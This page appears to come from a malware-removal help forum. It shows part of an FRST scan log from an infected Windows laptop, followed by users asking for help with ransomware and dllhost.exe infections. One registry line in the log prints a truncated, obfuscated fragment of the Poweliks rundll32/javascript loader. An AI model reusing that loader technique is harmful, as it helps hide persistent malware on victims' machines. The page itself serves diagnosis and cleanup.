C:\Users\Nikki\AppData\Local\Temp\prmouyy.dll C:\Users\Nikki\AppData\Local\Temp\ucfpooo.dll C:\Users\Nikki\AppData\Local\Temp\ygnvvtu.dll ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\explorer.exe => File is digitally signed C:\Windows\system32\winlogon.exe => File is digitally signed C:\Windows\system32\wininit.exe => File is digitally signed C:\Windows\system32\svchost.exe => File is digitally signed C:\Windows\system32\services.exe => File is digitally signed C:\Windows\system32\User32.dll => File is digitally signed C:\Windows\system32\userinit.exe => File is digitally signed C:\Windows\system32\rpcss.dll => File is digitally signed C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-09-16 13:18 ==================== End Of Log ============================ ADDITION.TXT: =============================================================================================== Additional scan result of Farbar Recovery Scan Tool (x86) Version: 24-09-2014 Ran by Nikki at 2014-09-24 04:00:30 Running from H:\ Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {19259FAE-8396-A113-46DB-15B0E7DFA289} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: ESET NOD32 Antivirus 7.0 (Enabled - Up to date) {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 32 Bit HP CIO Components Installer (Version: 7.1.4 - Hewlett-Packard) Hidden AccelerometerP11 (HKLM\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics) Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.152 - Adobe Systems Incorporated) Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated) Ask Toolbar (HKLM\...\{4F524A2D-5637-4300-76A7-A758B70C1002}) (Version: 12.16.2.57 - APN, LLC) <==== ATTENTION BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden Conexant HDA D330 MDC V.92 Modem (HKLM\...\CNXT_MODEM_HDAUDIO_VEN_14F1&DEV_2C06&SUBSYS_14F1000F) (Version: 7.80.4.0 - Conexant) Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden Dell ControlVault Host Components Installer (Version: 2.0.20.159 - Broadcom Corporation) Hidden Dell Data Protection | Access (HKLM\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.000 - Dell Inc.) Dell Data Protection | Access (Version: 01.00.01.000 - Wave Systems Corp) Hidden Dell Data Protection | Access | Drivers (HKLM\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.) Dell Data Protection | Access | Middleware (HKLM\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.) Dell System Manager (HKLM\...\{43CFE88C-A97B-4875-9BCC-E93EC0EEEEA4}) (Version: 1.6.00000 - Dell Inc.) Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.124 - ALPS ELECTRIC CO., LTD.) DellAccess (Version: 01.00.00.078 - Wave Systems Corp.) Hidden EMBASSY Security Center (Version: 04.02.00.072 - Wave Systems Corp.) Hidden ESET NOD32 Antivirus (HKLM\...\{1BE7C1D9-06A8-466D-ADEA-B07F68BDEFB5}) (Version: 7.0.302.26 - ESET, spol s r. o.) Foxit Reader (HKLM\...\Foxit Reader_is1) (Version: 6.0.5.618 - Foxit Corporation) FreeMind (HKLM\...\B991B020-2968-11D8-AF23-444553540000_is1) (Version: 0.9.0 - ) Gemalto (Version: 01.01.01.0000 - Wave Systems Corp) Hidden GeoGebra 4.4 (HKLM\...\GeoGebra 4.4) (Version: 4.4.22.0 - International GeoGebra Institute) Google Chrome (HKLM\...\Google Chrome) (Version: 37.0.2062.120 - Google Inc.) Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.) Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden IDrive version 3.4.1 January 03, 2012 (HKLM\...\IDrive_is1) (Version: 3.4.1 - ProSoftnet Corp) Intel® Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2418 - Intel Corporation) Java Auto Updater (Version: 2.1.67.1 - Oracle, Inc.) Hidden Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 5.2 - Paramount Software (UK) Ltd.) Macrium Reflect Free Edition (Version: 5.2.6474 - Paramount Software (UK) Ltd.) Hidden Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation) Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden Microsoft Office Home and Student 2013 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 15.0.4641.1003 - Microsoft Corporation) Microsoft OneDrive (HKCU\...\OneDriveSetup.exe) (Version: 17.0.4023.1211 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation) Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Mozilla Firefox 31.0 (x86 en-US) (HKLM\...\Mozilla Firefox 31.0 (x86 en-US)) (Version: 31.0 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla) MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) NTRU TCG Software Stack (Version: 2.1.34 - Security Innovation) Hidden NVIDIA Control Panel 327.62 (Version: 327.62 - NVIDIA Corporation) Hidden NVIDIA Graphics Driver 327.62 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 327.62 - NVIDIA Corporation) NVIDIA Install Application (Version: 2.1002.141.953 - NVIDIA Corporation) Hidden NVIDIA nView 140.75 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView) (Version: 140.75 - NVIDIA Corporation) NVIDIA Optimus 1.14.17 (Version: 1.14.17 - NVIDIA Corporation) Hidden NVIDIA Update Components (Version: 1.14.17 - NVIDIA Corporation) Hidden Office 15 Click-to-Run Extensibility Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (Version: 15.0.4641.1003 - Microsoft Corporation) Hidden PC-CCID (Version: 2.0.0 - Gemalto) Hidden Preboot Manager (Version: 03.02.00.066 - Wave Systems Corp.) Hidden Private Information Manager (Version: 07.00.00.026 - Wave Systems Corp.) Hidden Rosetta Stone Ltd Services (HKLM\...\{3165E4A6-D5DE-46B0-8597-D55E2B826B84}) (Version: 3.2.21 - Rosetta Stone Ltd.) Rosetta Stone TOTALe (HKLM\...\{6B6BC189-D606-4BC7-9758-E6C364F76A55}) (Version: 4.5.5.0 - Rosetta Stone, Ltd) Search Protect (HKLM\...\SearchProtect) (Version: 2.11.11.7 - Conduit) <==== ATTENTION Shopping App by Ask (HKLM\...\{4F524A2D-5354-2D53-5045-A758B70C1002}) (Version: 12.16.2.54 - APN, LLC) Skype™ 6.20 (HKLM\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 6.20.104 - Skype Technologies S.A.) SPBA 5.9 (Version: 5.9.4.6686 - UPEK Inc.) Hidden Stellarium 0.12.4 (HKLM\...\Stellarium_is1) (Version: 0.12.4 - Stellarium team) Trusted Drive Manager (Version: 4.0.5.8 - Wave Systems Corp.) Hidden Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) Hidden Wave Infrastructure Installer (Version: 07.02.40.0008 - Wave Systems Corp) Hidden Wave Support Software Installer (Version: 05.12.00.012 - Wave Systems Corp) Hidden WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.6900 - Broadcom Corporation) Windows Driver Package - Dell Inc. PBADRV System (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.) Windows Live Communications Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation) Windows Live Essentials (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden Windows Live Installer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Mail (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Messenger (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Movie Maker (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Photo Common (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Photo Gallery (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live PIMT Platform (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden Windows Live SOXE (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live SOXE Definitions (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live UX Platform (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live UX Platform Language Pack (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden Windows Live Writer (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden Windows Live Writer Resources (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{7B37E4E2-C62F-4914-9620-8FB5062718CC}\localserver32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B}\localserver32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\SkyDriveShell.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-475017880-3412151489-2877756071-1003_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Nikki\AppData\Local\Microsoft\SkyDrive\17.0.4023.1211\FileSyncApi.dll (Microsoft Corporation) ==================== Restore Points ========================= ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 22:04 - 2009-06-10 17:39 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {0CDB2C79-CAE5-468E-9E2D-4189D7879701} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX86\OfficeC2RClient.exe [2014-07-31] (Microsoft Corporation) Task: {3E124A1D-E97D-42DD-B565-CB02F622EE3B} - System32\Tasks\{9678620C-B7FF-D3EA-61BE-4E6BDD97CD72} => C:\Windows\system32\wosyw.dll [2014-09-23] () Task: {5B87279C-2CA5-4793-8CC5-331E71905A9A} - System32\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-08-18] (Google Inc.) Task: {6AB08C04-688B-49A7-B94C-3D73445E1FD7} - System32\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-08-18] (Google Inc.) Task: {6CAE4A3E-ADE6-4CF7-86CA-7F8CCF6B3988} - System32\Tasks\Time Trigger Test Task => C:\Users\Nikki\AppData\Local\Temp\yiivdqo.exe <==== ATTENTION Task: {FAF5FD9A-FD08-4431-94D6-CE7B46BEC4E3} - System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-NIKKI-Nikki Laptop-Nikki => C:\Program Files\Microsoft Office 15\Root\Office15\MsoSync.exe [2014-08-26] (Microsoft Corporation) Task: {FDF0D188-9609-4169-AFC2-5A0400F84111} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-14] (Adobe Systems Incorporated) (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cfbb013a16b54f.job => C:\Program Files\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfbb01ef80f922.job => C:\Program Files\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2014-03-08 16:17 - 2013-10-28 19:22 - 00088864 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax.dll 2014-03-08 02:40 - 2014-05-20 03:11 - 00080040 _____ () C:\Program Files\Microsoft Office 15\ClientX86\ApiClient.dll 2010-10-15 20:14 - 2010-10-15 20:14 - 00132384 _____ () C:\Program Files\WIDCOMM\Bluetooth Software\btkeyind.dll 2014-02-18 19:50 - 2011-06-10 13:36 - 00094208 _____ () C:\Windows\System32\IccLibDll.dll 2014-02-18 18:09 - 2010-12-17 12:24 - 00686704 _____ () C:\Program Files\STMicroelectronics\AccelerometerP11\FF_Protection.exe 2014-06-20 17:48 - 2014-06-20 17:48 - 00316584 _____ () C:\Program Files\Microsoft Office 15\Root\Office15\AppVIsvStream32.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver" ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (09/24/2014 03:56:41 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: iexplore.exe, version: 11.0.9600.17280, time stamp: 0x4a5bc6b7 Faulting module name: MSHTML.dll, version: 11.0.9600.17280, time stamp: 0x53f27d67 Exception code: 0xc0000005 Fault offset: 0x00140273 Faulting process id: 0x2960 Faulting application start time: 0xiexplore.exe0 Faulting application path: iexplore.exe1 Faulting module path: iexplore.exe2 Report Id: iexplore.exe3 Error: (09/24/2014 03:54:04 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x013d1138 Faulting process id: 0x2e50 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:41:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x008e1138 Faulting process id: 0x212c Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:39:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x007f1138 Faulting process id: 0x1294 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:39:34 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 03:36:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x004c1138 Faulting process id: 0x26a0 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:21:02 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x012b1138 Faulting process id: 0x1104 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 03:14:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 02:55:47 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Faulting application name: svchost.exe, version: 6.1.7600.16385, time stamp: 0x4a5bc100 Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 Exception code: 0xc0000005 Fault offset: 0x004c1138 Faulting process id: 0x2d90 Faulting application start time: 0xsvchost.exe0 Faulting application path: svchost.exe1 Faulting module path: svchost.exe2 Report Id: svchost.exe3 Error: (09/24/2014 02:46:27 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 System errors: ============= Error: (09/24/2014 03:40:34 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 03:40:06 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 03:38:58 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (09/24/2014 03:15:05 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 03:14:35 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 03:13:22 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Error: (09/24/2014 02:47:05 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}{344ED43D-D086-4961-86A6-1106F4ACAD9B}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC) Error: (09/24/2014 02:46:39 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (09/24/2014 02:46:17 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Media Player Network Sharing Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service. Error: (09/24/2014 02:45:55 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: The NTRU TSS v1.2.1.34 TCS service depends on the TPM Base Services service which failed to start because of the following error: %%0 Microsoft Office Sessions: ========================= Error: (09/24/2014 03:56:41 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: iexplore.exe11.0.9600.172804a5bc6b7MSHTML.dll11.0.9600.1728053f27d67c000000500140273296001cfd7ccc08d0cb1C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\MSHTML.dll5168a9fa-43c0-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:54:04 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005013d11382e5001cfd7cc71e836f6C:\Windows\system32\svchost.exeunknownf4044896-43bf-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:41:03 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005008e1138212c01cfd7cae18192c2C:\Windows\system32\svchost.exeunknown221cf317-43be-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:39:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005007f1138129401cfd7cab03f0adaC:\Windows\system32\svchost.exeunknownef425be2-43bd-11e4-8ecd-d0df9a3b4321 Error: (09/24/2014 03:39:34 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 03:36:37 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005004c113826a001cfd7ca425d2cdaC:\Windows\system32\svchost.exeunknown8369c1ec-43bd-11e4-a2a7-d0df9a3b4321 Error: (09/24/2014 03:21:02 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005012b1138110401cfd7c72096cbf7C:\Windows\system32\svchost.exeunknown5616a442-43bb-11e4-a2a7-d0df9a3b4321 Error: (09/24/2014 03:14:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (09/24/2014 02:55:47 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: svchost.exe6.1.7600.163854a5bc100unknown0.0.0.000000000c0000005004c11382d9001cfd7c4793cc1d8C:\Windows\system32\svchost.exeunknowncfa8f17b-43b7-11e4-8ed8-d0df9a3b4321 Error: (09/24/2014 02:46:27 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 ==================== Memory info =========================== Processor: Intel® Core i5-2520M CPU @ 2.50GHz Percentage of memory in use: 95% Total physical RAM: 3241.02 MB Available physical RAM: 155.8 MB Total Pagefile: 7408.45 MB Available Pagefile: 1118.56 MB Total Virtual: 2047.88 MB Available Virtual: 1922.06 MB ==================== Drives ================================ Drive c: (OSDisk) (Fixed) (Total:232.88 GB) (Free:192.73 GB) NTFS ==>[Drive with boot components (obtained from BCD)] Drive h: () (Removable) (Total:29.91 GB) (Free:29.89 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 232.9 GB) (Disk ID: 000CD844) Partition 1: (Active) - (Size=232.9 GB) - (Type=07 NTFS) Partition 00: (Not Active) - (Size=0) - (Type=00) ATTENTION ===> 0 byte partition bootkit. ======================================================== Disk: 1 (Size: 29.9 GB) (Disk ID: 00000000) Partition: GPT Partition Type. ==================== End Of Log ============================
  22. I have a Lenovo T410 laptop, running Windows 7 Professional (Svc.Pack 1), 64-bit and has been hacked with some kind of encryption virus and most of the files are encrypted with '.crypted' extension. Could anyone please suggest what needs to be done to remove the virus. This attack happened after a couple of days of the "dllhost" virus attack, and when my computer's wi-fi was left on for a couple of hours (dllhost was active and attracting more viruses when I my internet connection was on). #1) I have taken outside help to remove the "dllhost" virus but unfortunately they were not able to decrypt the files. #2) How do I ensure that "dllhost" virus is gone and won't come back. Is there a security patch that I can use. Any help or suggestions are appreciated. Thanks.
  23. Please help with dllhost.exe *32 COM surrogate removal. Please see enclosed FRST and Addition files. Need fixlist.txt file. Thanks! FRST.txt Addition.txt
  24. I recieve a group policy block after a virus or malware added group policy. On the user profile malwarebytes picks up malicious websites like 4682b4.com and other ip addresses. This is not the case when I log on as the administrator.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.